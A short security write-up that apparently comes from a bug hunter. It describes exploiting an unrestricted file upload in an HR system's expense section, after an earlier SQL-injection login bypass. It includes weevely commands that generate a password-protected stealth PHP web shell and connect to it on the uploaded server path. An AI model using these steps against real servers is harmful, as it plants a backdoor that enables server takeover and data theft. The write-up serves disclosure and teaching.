Weevely
Guide to upload weevely shell to exploit unrestricted file upload
| Vulnerability | Unrestricted file upload |
| Description | The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored. |
| Impact | The impact of this vulnerability is high, supposed code can be executed in the server context or on the client side. |
| Owasp test ID | OTG-CONFIG-003 |
Straight to the write-up, the web application was having lots of vulnerabilities like authentication bypass via SQL injection. The login panel was vulnerable to sqli. After gaining access to the lot of sensitive information I reported the vulnerability and they patched the login panel but I was able gain access once again via their Human Resource Management System (hrm.vulnerableurl.com).
After closely going through all of the sections like employee details, leave management and salary section, there was one feature of file upload in the add expense tab. Quickly checked for the unrestriceted file upload and it straightforward allowed me to upload the PHP file without any bypass. So created a shell with command weevely. now what is weevely?
Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. It allows you to dump the database, mount the web server to the local system and lot more features. Below are the steps to create shell
1
2
3
4
5
6
7
$ weevely generate p4ssw0rd sh3llfile.php
Generated 'sh3llfile.php' with password 'p4ssw0rd' of 677 byte size.
Upload the file and to access the remote shell type...
$ weevely https://hrm.vulnerableurl.com/sh3llfile.php p4ssw0rd
if it gives you successfull prompt of webroot then you've successfully backconnected with shell
The vulnerable file upload functionality where it allowed to upload the PHP shell.
The file path of the shell after uploading it to the server and it successfully gave backconnection to our listener on localhost. The vulnerable server was hostgator.